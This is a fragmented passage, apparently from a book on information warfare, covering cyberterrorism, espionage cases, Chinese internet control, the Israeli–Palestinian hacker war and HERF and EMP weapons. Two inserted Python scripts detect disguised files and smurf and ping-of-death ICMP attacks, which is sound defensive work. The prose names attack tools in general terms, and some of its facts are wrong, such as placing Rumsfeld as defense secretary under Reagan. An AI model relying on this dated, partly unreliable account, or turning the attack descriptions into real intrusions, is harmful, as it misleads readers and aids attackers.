government tries to be proactive, the United States is going to get nailed seriously—
sooner rather than later
...
A lot of people are going to be
willing to throw civil liberties out the window in an effort to recover from an attack
that cripples large portions of the nation’s critical infrastructure
...
Overall, however, cyberdefense is not well
understood and is not talked about sufficiently
...
Rogue groups have made numerous efforts to acquire encryption
algorithms and sophisticated tools
...
The Internet has become a new form of the “dead drop” (a Cold War–era term
for where spies left information) for terrorists, and bin Laden, the dissident and
wanted Saudi businessman who was indicted for the 1998 bombing of two U.S.
embassies in East Africa and is blamed for the 9-11 attacks in 2001, the bombing of the USS Cole
destroyer in Yemen, and the 2004 train bombing in Madrid, Spain, has taken advantage of that Internet dead drop zone
...
Officials say bin Laden began using encryption in
1996 but recently increased its use after U.S. officials revealed they were tapping his
satellite [1] phone calls in Afghanistan and tracking his activities
...
) to facilitate jihad against the Israeli occupiers and their supporters, according to Ahmed Yassin, the founder of the
militant Muslim group Hamas
...
WHY TERRORISTS AND ROGUES HAVE AN ADVANTAGE IN IW
Governments have neither the financial resources nor the technical know-how to
stay on top of hackers and computer terrorists
...
The private sector must itself take much of the action that
is necessary to prevent attacks being made on the Internet
...
There are no cookie-cutter solutions; every network is different
...
com, eBay, and other high-profile
Web sites to their knees
...
Second on the list of concerns is attacks that reach into networks to steal valuable corporate data
...
There is a real danger of terrorists and hostile rogue nations using
computer networks to wage international warfare
...
Cyberterrorism can be more effective and more costly to governments than the classic methods of bomb attacks and assassination
...
Solutions seem harder to come by today than solutions to the problems just
discussed
...
Companies must be more willing to invest in security systems to protect their networks
...
Default settings for software products sold to consumers should be at the highest level of security
...
Basically, that’s just what
the software companies are doing
...
If you have a choice of spending five million dollars on getting 693,000 new customers, or five million dollars on better serving the ones you already have, that’s a
difficult value proposition
...
The severity of attacks could get worse, though, and businesses would be wise to
make precautionary investments now
...
Cyberattack Risks If You’re a Superpower
IW and other security threats simply come with the territory when your country is the
world’s only remaining superpower
...
There is no other country that can challenge the United States directly
...
This challenge could
come in the form of nuclear (see sidebar, “Stopping Nuclear Blackmail”), chemical,
biological (see sidebar, “Chemical and Biological Terrorism”), or even cyberwarfare
(see sidebar, “Hacker-Controlled Tanks, Planes, and Warships”) attacks
...
In a few years, and without much warning, Iranian and Iraqi missiles
could also be targeted at us and our allies
...
None of this was clear in 1998; it is undeniable now
...
A full warning came in a 1998 report of the commission on missile threats
headed by Defense Secretary Donald Rumsfeld
...
The panel had access to
all U.S. intelligence sources, and its conclusion was unanimous: rogue states could
inflict major destruction on the United States within five years of deciding to do so,
and with little or no notice to us
...
That conclusion contradicted a 1995
national intelligence estimate that had said there would be no threat to the 48 contiguous states for the next 15 years
...
The Rumsfeld report at first seemed to do little to change the views of President
Clinton’s top defense advisers
...
Henry
Shelton, the chairman of the Joint Chiefs of Staff, wrote that “the intelligence community can provide the necessary warning” of hostile missile development and
added, “We view this as an unlikely development
...
The
launch indicates that North Korea has made progress in building the Taepo Dong 2,
whose 10,000-kilometer range includes not only Alaska and Hawaii but also much
of the continental United States
...
A NEW WORLD
The case against rapid deployment rests on three arguments: (1) the threat isn’t real,
(2) the technology is impossible, and (3) it is more important to maintain the
antiballistic missile treaty signed with the Soviet Union in 1972, which bars most
missile defense systems
...
Argument 2
is still raised by some who note that the United States has spent large sums on missile
defense since Ronald Reagan proposed it in 1983, with disappointing results, but
stopping a few rogue-state missiles with the computers of 2005 is much easier than
stopping hundreds of Soviet missiles with the computers of 1983
...
The argument for the treaty was that a missile defense system might
provoke a Soviet or American first strike
...
CHEMICAL AND BIOLOGICAL TERRORISM
In For Your Eyes Only, James Bond’s irrepressible quartermaster, Major Boothroyd
(a.k.a. Q)
...
Using a faceless mannequin, one of Q’s assistants illustrates how the umbrella looks and acts like it should
until struck by water (as umbrellas are wont to do from time to time)
...
The motion is quick and precise, but one can’t help but imagine
the far messier spectacle if a human being were caught under it in a rainstorm
...
In September 1978, the Bulgarian secret service shot a Bulgarian exile,
Georgi Markov, with just such a device
...
The pellet contained only a few hundred millionths of a gram of the deadly poison ricin (supplied by the KGB), but it
was enough
...
Another Bulgarian
defector, Vladimir Kostov, was similarly attacked in Paris the month before
...
He sought medical treatment after hearing of Markov’s death and doctors removed from his back a small
pellet identical to the one used to kill Markov
...
In their infamous sarin gas attack on the Tokyo subway, Aum
operatives chose the decidedly low-tech dissemination method of dropping bags of
liquid sarin on the floor, puncturing them with the sharpened ends of their umbrellas, and then beating a hasty retreat as the nasty stuff spilled out onto the ground
...
Analysts have long commented on the copycat nature of terrorists and terrorist
groups
...
Given such a phenomenon
among terrorists, is the United States witnessing any evidence of an increase in the use
of umbrellas in terrorist operations—especially those involving chemical and biological weapons? Should the United States be calling for an international embargo on
umbrella sales to Afghanistan to prevent Osama bin Laden and his al-Qaeda organization from acquiring such dangerous, dual-use technology? Probably yes
...
Although the jury is still out, Aum may
have been unique
...
Rather than use an umbrella,
the MPC experimented with using hand lotion as a means of dissemination
...
Not even the Weather Underground, whose name would
seem to imply an interest in such methods, showed evidence of ever considering
using umbrellas in any of their attacks
...
So the answer is yes, the standard terrorist arsenal is
now the gun, the bomb, the plane bomb, box cutters, and even the umbrella or anything else they can get their hands on
...
HACKER-CONTROLLED TANKS, PLANES, AND WARSHIPS
Army officials are worried that sophisticated hackers and other cyber criminals,
including military adversaries, may soon have the ability to hack their way into and
take control of major military weapon systems such as tanks and ships
...
Unlike in the past, today’s modern tanks and ships are almost
entirely dependent on computers, software, and data communications links for
functions such as navigation, targeting, and command and control
...
In fact, the Defense Department (DoD) has already tested and proven that hackers
have the ability to infiltrate the command and control systems of major weapons,
including Navy warships
...
Yes, this actually happened
...
Fortunately, this was only a controlled test to see what could be done
...
Although there are well-known security gaps in the commercial systems that the
Army plans to use on the battlefield, hacking into tanks and other weapons may be too
difficult for an enemy engaged in battle
...
Such tactics would be nearly impossible to employ beyond the random harassment level
...
In addition to the two dozen countries known to be pursuing technologies that would enable them to produce weapons of mass destruction, threats to the nation’s critical infrastructure from cyberattacks are also high on
the present administration’s list of things to prepare for
...
If you can shut down the
United States’ financial system, if you could shut down the transportation system, if
you could cause the collapse of an energy production and distribution system just by
typing on a computer and causing those links to this globalization to break down,
then you’re able to wage successful warfare, and the United States has to be able to
defend against that
...
U.S. Government Agencies Shape Cyberwarning
Strategy Against Terrorists and Rogues
Under pressure from Congress to better coordinate the government’s response to
computer viruses and other cyberattacks by terrorists and rogue states, the National
Security Council (NSC) has developed a plan outlining roles and responsibilities for
federal cybersecurity organizations
...
The memo describing this plan identifies the organizations and agencies to be
involved in various kinds of attacks and defines the criteria for NIPC to call a meeting of the full cybersecurity community
...
This institutionalizes how the United States will share information, both at an operations level and
at a policy level when cyberincidents occur
...
NIPC, based at the FBI, was established in 1998 to serve as the government’s
central organization to assess cyberthreats, issue warnings, and coordinate responses
...
The proliferation of organizations with overlapping oversight
and assistance responsibilities is a source of potential confusion among agency personnel and may be an inefficient use of scarce technical resources
...
The lack of formal coordination
and communication led to many more agencies being affected by the incident than
necessary, according to the General Accounting Office (GAO)
...
In the past, that type of coordination happened on an ad hoc basis
...
Some of the formal mechanisms that existed were frankly ineffective in the
tasks they were meant to do
...
THE DARK WORLD OF THE CYBER UNDERGROUND
It was nearly Christmas (1998) when Dionne Smith received an alarming letter
that dampened her holiday spirit—to say the least
...
The 1998 Christmas incident was a horrible and frightening
experience—which was one of approximately 220 nuclear, biological (see sidebar,
“Bioterrorists on the Green”), and chemical scares (including some 140 anthrax
false alarms) in this country alone
...
The fear is that if some party wanted to, they
could damage a major crop—and the economy—by introducing a plant pathogen
that doesn’t normally exist here
...
If the
group were sophisticated enough, they could genetically engineer a highly pathogenic strain, produce it in large quantities, and sneak a lot of it in
...
Ninety-nine percent or more of the genes in crops are the same across the United States, and
that uniformity makes an epidemic much more likely
...
Even then, spores could survive and infect the next year’s crop
...
It would
be a continuing, recurring problem, like a permanent bomb going off
...
Their major
worry is that terrorists are adding chemical and biological weapons to their arsenal
of arms, and that, one day, they’ll make good on their threats
...
The ambitious plans include
amassing antidotes to potential bioagents such as anthrax and other bacteria and
viruses and to chemical weapons such as the nerve agent sarin
...
These new
programs have helped make counterterrorism one of the fastest-growing parts of
the federal budget, even as terrorist acts plunged to a 33-year low prior to the 9-11
attacks, according to congressional budget analysts
...
The question is
whether it’s money well spent
...
A growing number of government and private counterterrorism experts agree
...
It’s Mom, apple pie, and
terrorism
...
Today, there are some 400 training courses run by myriad agencies, including the Energy and Justice Departments, the Environmental Protection
Agency, and the Federal Emergency Management Agency (FEMA)
...
In 1996, HHS spent $7 million on its “bioterrorism” initiative
...
Most notably, the department intends to create a national stockpile of millions of doses of
vaccines and antibiotics, a potential boon for pharmaceutical companies that are
among those eagerly lobbying for more antiterrorism measures
...
None of these potential killers appear on the CIA’s list of biggest germ threats from
terrorist groups
...
Tularemia
and pneumonic plague are very easy to develop
...
Other agencies are clamoring for a piece of the pie, leading to tremendous internecine fighting
...
The Department of Veterans
Affairs wants to wrest stockpiling duties away from the Centers for Disease Control
and Prevention, and the National Guard, a powerful lobby on Capitol Hill, is creating its own hazardous materials response teams, even though there are already
more than 800 state and local hazardous material (HAZMAT) units, plus additional crews in the Army, Marine Corps, EPA, and Coast Guard
...
Not to be left out, the
United States Holocaust Memorial Museum and the Office of Personnel Management want $6 million apiece, and the Smithsonian Institution is asking for $7 million to bolster security against potential terrorist attacks
...
The 1995 Tokyo subway
gas attack by the cult Aum Shinrikyo was a shot across the bow
...
The only major case of bioterrorism in the United States was in 1984 by followers
of the Indian guru Bhagwan Shree Rajneesh, who had set up a commune in Oregon
...
Still, law enforcement officials
are convinced that the risk merits whatever preventive measures the government can
afford
...
One reason there have been no attacks is that it’s so tough to effectively use biological weapons, but a dozen hostile nations now either possess or are actively
pursuing bioweapons
...
They also agree that terrorists cannot
carry out large-scale lethal attacks without the backing of a foreign government
...
The question is, how much? Nobody knows, because few have bothered to assess how real the threats are
...
It’s one of those things it’s hard to
say no to
...
Was that wrong to do? You have to
look at the world you’re operating in
...
He or she might have packed a truck with explosives and
sent it careening into a power plant
...
Now, intelligence experts say, it’s possible for a trained computer hacker to darken Gotham from the comfort of home
or a cybercafé (at a coffee house)
...
Worse yet, he or she may enjoy the full backing and technical support
of a foreign government
...
China, Cuba, Russia, Korea, and Iran are among
those deemed a threat, sources later declared
...
This would
disrupt and destroy the U.S. economy
...
Officials are worried because so much of America’s infrastructure is either driven or connected by computers
...
All are vulnerable
...
In 1996, a Swedish hacker wormed his way through cyberspace from London
to Atlanta to Florida, where he rerouted and tied up telephone lines to 11 counties,
put 911 emergency service systems out of commission, and impeded the emergency responses of police, fire, and ambulance services
...
The number of pending FBI cases involving computer
crimes (a category that includes computer infrastructure attacks and financial
crimes) increased from 451 in 1999 to about 1,100 in 2004
...
” The secret war game began
with a set of written scenarios in which energy and telecommunications utilities
were disrupted by computer attacks
...
The scenario posited that people, driven by curiosity, would phone 911 and
overwhelm the system
...
After gaining access to the military’s electronic
message systems, the teams were poised to intercept, delete, and modify all messages on the networks
...
In another exercise, the
DoD found that 74% of test attacks on its own systems went undetected
...
The classic tropes of the spy game have gone
the way of the Model T
...
FBI brass called Ames the worst case of treason in U.S. history
...
Government officials confirmed that scientist Wen Ho Lee, suspected of stealing classified
data from a secret weapons laboratory, downloaded reams of classified nuclear
weapons information from a high-security computer system to one that could be
accessed with relative ease
...
The FBI is talking about millions of lines of computer code here, data bits gathered during the
course of 53 years of research and more than 5,000 nuclear tests—information that
shows how the nation’s most sophisticated nuclear weapons work
...
It
is flabbergasting
...
The someone in question was Wen Ho Lee, a Taiwan-born scientist employed,
until recently, at the Department of Energy’s weapons laboratory in Los Alamos,
New Mexico
...
Prosecutors have
not charged Lee with spying, and he has asserted his innocence, but when FBI agents
searched Lee’s computer after his dismissal, officials say, they discovered that he had
transferred an incredibly large amount of nuclear data from the Energy Department’s
high-security computers to the more accessible network, dumped the information
under bogus file names, then tried to erase the evidence from his hard drive
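An examiner looking for data stashed under bogus file names does not trust the name: the leading bytes of each file are compared with the type its extension claims, and disagreements go on the triage list. The following is an added example, not code from the book and not the FBI’s method in the Lee case; the signature table, the sample file names and their contents are constructed for illustration.

```python
"""Compare what a file's leading bytes say it is with what its name claims.
Added example; the signature table and the sample files are constructed."""
from typing import Dict, List, Tuple

# Leading-byte signatures ("magic numbers") and the content type each denotes.
SIGNATURES: Dict[bytes, str] = {
    b"%PDF-": "pdf",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF89a": "gif",
    b"PK\x03\x04": "zip",
    b"\x7fELF": "elf",
}
# Extensions that legitimately carry another type's signature.
ALIASES = {"jpeg": "jpg", "docx": "zip", "xlsx": "zip", "jar": "zip"}
TEXT_EXTENSIONS = {"txt", "log", "csv", "md"}
RECOGNISED = set(SIGNATURES.values()) | {"text"}


def sniff_type(data: bytes) -> str:
    """Type implied by the content: a signature match, 'text' for printable
    ASCII, otherwise 'unknown'."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    head = data[:512]
    if head and all(b in b"\t\r\n" or 32 <= b < 127 for b in head):
        return "text"
    return "unknown"


def claimed_type(name: str) -> str:
    """Type the file name claims, normalised; '' when there is no extension."""
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    ext = ALIASES.get(ext, ext)
    return "text" if ext in TEXT_EXTENSIONS else ext


def find_mismatches(files: Dict[str, bytes]) -> List[Tuple[str, str, str]]:
    """Return (name, claimed, actual) for every file worth a second look:
    a recognised signature under a different extension, or an extension that
    promises a type the bytes do not deliver. Files with no extension, and
    files where neither side is recognised, are skipped."""
    findings = []
    for name, data in files.items():
        claimed, actual = claimed_type(name), sniff_type(data)
        if not claimed or (claimed not in RECOGNISED and actual == "unknown"):
            continue
        if claimed != actual:
            findings.append((name, claimed, actual))
    return findings


# Constructed samples; a mounted disk image would be walked the same way.
SAMPLE_FILES: Dict[str, bytes] = {
    "minutes.txt":   b"Meeting notes, 3 March\nAttendees: ops, legal\n",
    "photo_001.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
    "photo_002.jpg": b"PK\x03\x04" + b"\x00" * 32,           # archive under an image name
    "budget.dat":    b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n",       # document under a neutral name
    "logo.png":      b"not an image at all, just notes\n",   # text under an image name
    "backup.tgz":    b"\x1f\x8b\x08\x00" + b"\x00" * 16,      # gzip: no rule here, left alone
}

if __name__ == "__main__":
    for name, claimed, actual in find_mismatches(SAMPLE_FILES):
        print(f"{name}: named as {claimed}, content looks like {actual}")
```

The check is deliberately conservative: a neutral extension such as .dat is only reported when the bytes carry a signature the table knows, so the list stays short enough to work through by hand on a large volume.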
...
The evidence gathered to date does not show that the security breach resulted in
damage on a massive scale, but it is huge nonetheless
...
Some officials say that may never be known for sure
...
Lee first
came under suspicion in 1996, after the CIA obtained a document showing that
China’s military had obtained classified information about the size and shape of
America’s newest miniaturized nuclear warhead, the W-88
...
When agents in the FBI’s Albuquerque field office pressed for a search warrant in Washington, lawyers at the Justice Department rebuffed the request
...
In any case, by that time the damage was done
...
Their hacker assaults on the Pentagon, NASA (which was very easy), and a U.S. nuclear weapons research lab were described as the most organized and systematic attack on U.S. computers ever discovered
...
They were directed by a
teenage hacker in Israel
...
Recent events make clear
that tighter defenses are needed
...
The loopholes the teenager exploited have been closed, but no computer environment is totally secure
...
You will never get to your destination
...
Chinese computer networks are easy to break into
...
From the moment in 1995 that a commercial Internet provider first gave Chinese citizens access to the Web, the government has tried to maintain what some
cybersurfers derisively call “the Great Firewall of China
...
Sabotage
Sophisticated hackers, meanwhile, are breaking into sensitive Chinese computers (see
sidebar, “Cyberspace Incidents on the Rise in China”)
...
The ultimate aim is to use hacktivism to ameliorate human rights conditions
...
The latest
warning comes from a report published in 2004 by a network security firm founded
by two former U.S. Navy intelligence officers
...
The most important consideration is that, in one way or another, the government is involved in the operation, regulation, and monitoring of China’s networks
...
Representatives from companies with major operations in China indicate that
they have never had problems and don’t plan to run scared now
...
The real focus of the control efforts is what the
Chinese call “black and yellow,” or political and pornographic, material
...
Nevertheless, other companies are not convinced that the Chinese government
is overtly (or, for that matter, covertly) engaging in corporate espionage via the
Internet
...
That
puts high-tech vendor companies particularly at risk
...
Every business in China is run by the government; any effort to
develop intelligence and promote those industries is a national effort
...
The U.S. firms that may be at the greatest risk of losing proprietary data include
companies that have set up development laboratories in China, but those companies, eager to gain a foothold in China’s burgeoning information technology (IT)
market, don’t necessarily share the fears of intelligence experts
...
Although the Chinese
view controls and regulations as necessary to facilitate an orderly Internet market
and to protect the country from subversion and other Internet crimes, the controls
are partially the result of political rigidity and bureaucratic inertia
...
The thought that there are lots of people with
time on their hands to explore what the 50 million Internet users in China are doing
is totally impractical
...
A political journal called Tunnel
(http://www
...
com/SiliconValley/Bay/5598/) is said to be edited secretly in
China and sent by email each week to an address in the United States, from which
it is then emailed anonymously back to thousands of Chinese readers
...
ifcss
...
One recent issue extolled individualism and paid tribute to the mother of a student killed
when troops crushed the pro-democracy protest in Tiananmen Square in 1989
...
If you tried
to publish a traditional newsletter promoting democracy in China, you’d surely get
arrested
...
Perhaps they are smart enough
...
Nonetheless, China’s wired population has
grown to 7
...
Although that is a tiny
portion of an overall population of roughly 1.3 billion, China’s Internet users are
virtually by definition the country’s most educated and modern elite
...
What the Chinese
government is really afraid of is political infiltration
...
Perhaps most worrisome to the authorities, young Chinese are using the Net to
coordinate political campaigns
...
Chinese security officials
ignored the demonstration until it reached the streets
...
The incidents weren’t written up
in the Chinese news, but were posted on the Web
...
In Shanghai, a
computer engineer named Lin Hai faces charges of inciting the overthrow of state
power by providing 60,000 email addresses to Big Reference
...
THE SUPER COMPUTER LITERATE TERRORIST
During the next 20 years, the United States will face a new breed of Internet-enabled
terrorists, super computer literate criminals, and nation-state adversaries who will
launch attacks not with planes and tanks, but with computer viruses and logic
bombs
...
The United States faces
an increasingly wired but dangerous world, as evidenced by the following:
Many countries have programs to develop cyberattack technologies and could
develop such capabilities over the next decade and beyond
...
Terrorist groups are developing weapons of mass destruction
...
The Russian
equivalent of the U.S. National Security Agency and organized crime groups recruit the best talent
...
A report by the Washington-based Center for Strategic and International Studies (CSIS) went even further, warning of a future cyberarms race and the rise of terrorist groups supported by super computer literate youngsters bent on disrupting
the Internet
...
Officials say critical infrastructures in the United
States could be targeted in the future as revenge for incidents like the 1999 accidental bombing of the Chinese embassy in Serbia
...
Online extortion and falsification of shipping manifests by criminals and attempts by countries to use hacking techniques to evade trade sanctions are a rising
concern
...
Hackers are finding ways to penetrate these devices and possibly use them as
launching pads for more devastating distributed denial-of-service attacks
...
Therefore, the real threat comes from the design of the U.S. infrastructure and
the people who run it
...
If a major attack is made on the infrastructure, it’s going to happen from the inside
...
However, that future preparedness will be determined by how much
emphasis companies and the government place on fixing known vulnerabilities,
training and education, and enforcing good security policies
...
It’s scary, but it’s really hard to bring down the Internet
...
The intense, lanky 27-year-old is hunting for
holes in a corporate network
...
Any one of these could become a key for breaking into the system
...
He’s a security engineer at an information
security company where he’s paid to tinker with clients’ networks and uncover
their vulnerabilities
...
That demand is spawning a lucrative market
...
1 billion worldwide in 2006 and are growing at a per-year compound rate of 54%, according to
predictions of the research firm GartnerGroup
...
Many ex-hackers have become security consultants
...
Tying security into a company’s e-commerce [3] strategy also is key
...
Meetings with prospective clients begin with a knowledge test of what and
whom the security specialist knows
...
What makes the security professional different from other IT professionals is that they have to know something about
everything
...
Others, though, are hit with sticker shock
...
Mark has to provide a clear return on investment statement
...
Mark has to identify the probability that something will happen—it’s the downstream effect
...
He assesses
a company’s “pain threshold,” or how much security risk it can endure before
the business would shut down
...
Mark then either implements the plan or recommends how the client can
enact it
...
How Palestinian hackers watch and what they know will determine the success of this cyberwar for them
...
Visitors to the site are greeted with the message, “I swear that I
will not use these programs on anyone but Jews and Israelis
...
LoveLetter, Chernobyl
(CIH), and the Melissa Virus (along with 12 Word macro viruses) form the arsenal
for attacking Israeli sites
...
According to sources at iDefense, an international security firm monitoring
the situation, pro-Palestinian hackers use a variety of tools to orchestrate a well-organized attack against the 400 or more Israeli Web sites that have been hit during the conflict
...
The pro-Palestinians
have been much more aggressive in scope
...
Over 559 Web sites have been targeted by both sides for denial-of-service attacks, attempts to gain root access, system penetrations, defacements, and a variety
of other attacks
...
The conflict began on October 6, 2000, when pro-Israeli hackers created a Web
site to host FloodNet attacks
...
Sixteen tools have been identified as those actively distributed among attackers, with many others being discussed or suspected
of already being deployed
...
The tool launches a “ping of death attack” that,
when utilized by several users against the same target, crashes the system
...
Used simultaneously by multiple attackers,
the tool crashes an email server
...
It is believed to be the tool used for hack attacks on the Israeli Foreign
Ministry site and its Webmaster’s email address
...
Borrowing
amplifying power from broadcast sites, the hackers send out pings that are boosted
10,000-fold or more
...
org using one computer with a 56K modem and an ADSL line
...
org, a site that provides a list of broadcast sites with an
average amplification of times five, a dial-up user with 28
...
0 kbps of traffic, about two-thirds of a T1 link
...
Netscan
...
Pro-Palestinians recently turned the tables by using broadcast-site attack tools
against Israeli sites
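Two of the tools described above leave simple traces in traffic. The broadcast-amplification attack shows up as ICMP echo requests addressed to a subnet’s directed-broadcast address (the source address is the spoofed victim, which is why every host on that subnet answers it), and the “ping of death” as a fragment whose data would end beyond the 65,535-byte IPv4 datagram limit, something no legitimate datagram can produce. The following is an added example, not code from the book or from any of the groups it describes; the packet summaries, the watched subnets and the amplification factor are constructed for illustration.

```python
"""Triage of ICMP echo traffic for two attacks named on this page:
broadcast amplification ("smurf") and the oversized "ping of death".
Added example; the packet summaries below are constructed, not captured."""
import ipaddress
from typing import Dict, List, Tuple

IPV4_MAX_LEN = 65535  # largest value the 16-bit IPv4 total-length field can hold

# Subnets whose directed-broadcast addresses we watch (assumed for the example).
NETWORKS = [ipaddress.ip_network("192.0.2.0/24"),
            ipaddress.ip_network("198.51.100.0/24")]

# Constructed per-fragment summaries, as a capture tool might log them.
# "offset" is the IP fragment offset in 8-byte units, "len" the fragment's data
# length; only the first fragment (offset 0) carries the ICMP type field.
PACKETS = [
    {"src": "203.0.113.4", "dst": "192.0.2.255",    "proto": "icmp", "type": 8,    "offset": 0,    "len": 64},
    {"src": "203.0.113.4", "dst": "198.51.100.255", "proto": "icmp", "type": 8,    "offset": 0,    "len": 64},
    {"src": "10.0.0.9",    "dst": "192.0.2.10",     "proto": "icmp", "type": 8,    "offset": 0,    "len": 64},
    {"src": "10.0.0.7",    "dst": "192.0.2.10",     "proto": "icmp", "type": 8,    "offset": 0,    "len": 1480},
    {"src": "10.0.0.7",    "dst": "192.0.2.10",     "proto": "icmp", "type": None, "offset": 8184, "len": 100},
]


def is_directed_broadcast(dst: str) -> bool:
    """True if dst is the broadcast address of one of the watched subnets."""
    addr = ipaddress.ip_address(dst)
    return any(addr == net.broadcast_address for net in NETWORKS)


def broadcast_echo_by_source(packets) -> Dict[str, int]:
    """Count ICMP echo requests aimed at a directed-broadcast address, keyed by
    source. In a smurf attack that source is the spoofed victim, so the count
    is the number of amplified reply bursts it will absorb. Dropping directed
    broadcasts at the border router removes the amplifier entirely."""
    counts: Dict[str, int] = {}
    for p in packets:
        if p["proto"] == "icmp" and p["type"] == 8 and is_directed_broadcast(p["dst"]):
            counts[p["src"]] = counts.get(p["src"], 0) + 1
    return counts


def oversized_fragments(packets) -> List[Tuple[str, str, int]]:
    """Return (src, dst, end) for fragments whose data would end past the IPv4
    length limit once reassembled. A valid datagram can never yield such a
    fragment, so this is the "ping of death" signature regardless of how the
    earlier fragments looked."""
    hits = []
    for p in packets:
        end = p["offset"] * 8 + p["len"]
        if p["proto"] == "icmp" and end > IPV4_MAX_LEN:
            hits.append((p["src"], p["dst"], end))
    return hits


def reflected_kbps(uplink_kbps: float, amplification: float) -> float:
    """Traffic a reflector delivers to the victim for a given attacker uplink,
    e.g. a 28.8 kbps dial-up line through a site that amplifies five times."""
    return uplink_kbps * amplification


if __name__ == "__main__":
    print("broadcast echo requests by (spoofed) source:", broadcast_echo_by_source(PACKETS))
    print("fragments past the IPv4 limit:", oversized_fragments(PACKETS))
    print("28.8 kbps uplink through a x5 reflector:", reflected_kbps(28.8, 5), "kbps")
```

The fragment check needs no reassembly state: the offset of the last fragment alone proves the datagram is malformed, which is why it can run on a stateless filter at line rate.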
...
Hackers are making moves to gain root access to Israeli computers and servers
...
In essence, a hacker who gains root
access control of a computer can scan, delete, and add files, use it as an attack tool
against others, and even view and hear users whose computers are equipped with
cameras and microphones
...
Hackers such as DoDi have come
out and said that the current war isn’t just against Israel, but the United States as
well
...
The irony is that the number of times that U.S. government sites have been targeted by Israelis is greater than the number of times they were targeted by pro-Palestinians, yet the American media fails to identify the real perpetrators and
victimizes the Arabs as usual
...
How Israelis Watch and What They Know
A group of self-described ethical hackers are taking the reins of Israel’s Web networks into their own hands in the Middle East’s cyberwar
...
The Information Warfare Arsenal and Tactics of Terrorists and Rogues
According to the IIU mantra, they are dedicated to the Israeli spirit and united to protect Israel on the Internet against any kind of attacks from malicious hacking groups
...
Listed are
over 80 Israeli sites that have been defaced and vandalized by various hacking groups
...
IIU also provides a list of Israeli sites that they believe run services with commonly known security holes such as BIND NXT overflow, IIS 4 holes, and FTP format string bugs
...
com, one of the largest Jewish booksellers on the Web,
serve as a warning to those Israeli sites with suspect security
...
com text and graphics were recently replaced with the word “Palestine” in flaming letters and with text asking Israelis if the Torah teaches them to kill innocent kids and rape women
...
Taking credit for the attack is the group GForce Pakistan, a well-known activist
group that has joined forces with Palestinians and other Arab hackers in fighting
the cyberwar against Israeli interests
...
On November 3, 2000, DoDi defaced an Israeli
site and stated he could shut down the Israeli ISP NetVision, host of almost 80% of
the country’s Internet traffic
...
The Muslim extremist group UNITY, with ties to Hezbollah, laid out a four-part plan for destroying the Israeli Internet infrastructure at the onset of the cyberwar
...
IIU said there is already evidence of
phase-four attacks, such as the destruction of business sites with e-commerce capabilities, which they believe caused a recent 12% dip in the Israeli stock exchange
...
ISPs and
e-businesses must recognize the need to install protection that goes beyond firewalls to provide real security against application-level assaults
...
The stated goal of the project is to inform and
provide solutions wherever the IIU can and, therefore, protect their sites against
political cybervandalism
...
The SODA Project formed an alliance with the Internet security firm 2XS Ltd
...
2XS Ltd
...
On November 3, 2000, IIU contacted 2XS Ltd
...
Another link on the SODA Project is the Internet security information forum SecurityFocus
...
The site is not taking any sides in the Middle
Eastern war
...
They only need to find one
vulnerable victim to succeed, perhaps after checking thousands of potential victims
...
The victims end up
being citizens and businesses in the affected area
...
THE NEW TOOLS OF TERRORISM
Despite increasing concern about cyberterrorism, the tactics and goals of the
world’s terrorist organizations remain low-tech
...
A growing percentage of terrorist attacks are designed to kill as many people as possible
...
However, terrorists are adopting information technology as an indispensable
command-and-control tool
...
Instead of
just finding a few handwritten notebooks and address books, counterterrorism authorities are faced with dozens of CD-ROMs and hard drives
...
Terrorist groups, such as the Osama bin Laden organization, have yet to demonstrate that they value the relatively bloodless outcome of a cyberattack on a nation’s critical infrastructure, but the threat remains real
...
If the United States fails to recognize this, then the United States will pay another high price, as it did on 9-11
...
In this
section, these are broadly grouped into three main types: high energy radio frequency
(HERF) guns, electromagnetic pulse (EMP), and other information weapons
...
Electronic circuits are vulnerable to overload;
a HERF gun simply overloads particular circuits to disable specific pieces of equipment that are dependent on that circuit
...
Pointed at a computer, a HERF gun may either permanently or temporarily terminate its operations
...
Although currently limited in range and destructive capacity, in the near future, HERF guns are likely to be substantially more capable and freely available and,
therefore, must be taken seriously
...
The defensive measures that can be employed to reduce the risks of
HERF attacks are not well developed at this stage but include using Gaussian shielding, gaseous discharge devices, and the maintenance of physical separation
...
Initially discovered as a side effect of nuclear tests, the phenomenon has now been
extended to nonnuclear generators
...
A development beam generator with a
1 gigawatt capacity could be used to develop a line-of-sight EMP that would knock
out most unshielded electronic devices within a radius measurable in tens to hundreds of meters, depending on the employment method
...
The current limitations of these weapons are power
generation and capacitor storage capability, but these can be expected to be overcome in the future
...
EMP weapons are less discriminatory than
HERF guns and could be used to shut down a general area rather than a specific system
...
Other Information Weapons
Several weapons are currently being developed that do not fit in the HERF or EMP
categories
...
The following weapons are described in a variety of freely available publications and give an indication of the technologies being developed and the possible capabilities that may result
...
Low-energy lasers have already been fitted on rifles and armored vehicles and
were deployed during the Gulf War
...
Electric-Power Disruption Technologies
An electric-power disruption weapon was first used during the Gulf War in 1991
...
The weapon uses light conductive
carbon fibers that wrap around transmission lines and distribution points to cause
a massive short circuit
...
This weapon can be delivered
by cruise missiles, as was the case in the Gulf War, or from manned aircraft
...
Collectively, they offer a decisive addition to military
power
...
Accordingly, nations
developing information strategies should consider investing, both intellectually and
financially, across the gamut of information operations
...
The risk is real
...
As
previously mentioned, the report was the work of a private commission headed by
Donald Rumsfeld, secretary of defense under President Reagan and the second
President Bush
...
The
states trade with one another and build on the progress of other members of the
club to advance their own systems
...
Another factor, the report points out, is that access to information on a global
scale keeps growing exponentially, as the bounds of the Internet in particular remain uncharted
...
There is a fourth factor: the flexibility with which technical personnel from the
West, and especially from the former Soviet Union, can move to a potential proliferator
...
They are also well aware that it is the acquisition of such whole systems that
garners the most international attention and is most easily policed by the web of
agreements, such as the Missile Technology Control Regime, that the United States
and its allies have spun to guard against proliferation
...
Many such scientists and technicians, particularly in the former Soviet states,
are willing and eager to improve their material lot by helping renegade nations enhance systems that were often acquired from the Soviet Union or that are derivatives of such systems
...
Other than propose alternative employment, the United States and its allies have little to offer, particularly to those motivated by ideological or religious ideals
...
Should a Muslim nation, for example, be taken
over by extremists, it could seek support in other Muslim nations from like-minded
elements that might not necessarily have seized power but would be in a position to
offer the new regime intellectual assistance and perhaps financial aid
...
Otherwise, Libya would
long ago have been in a position to threaten the United States
...
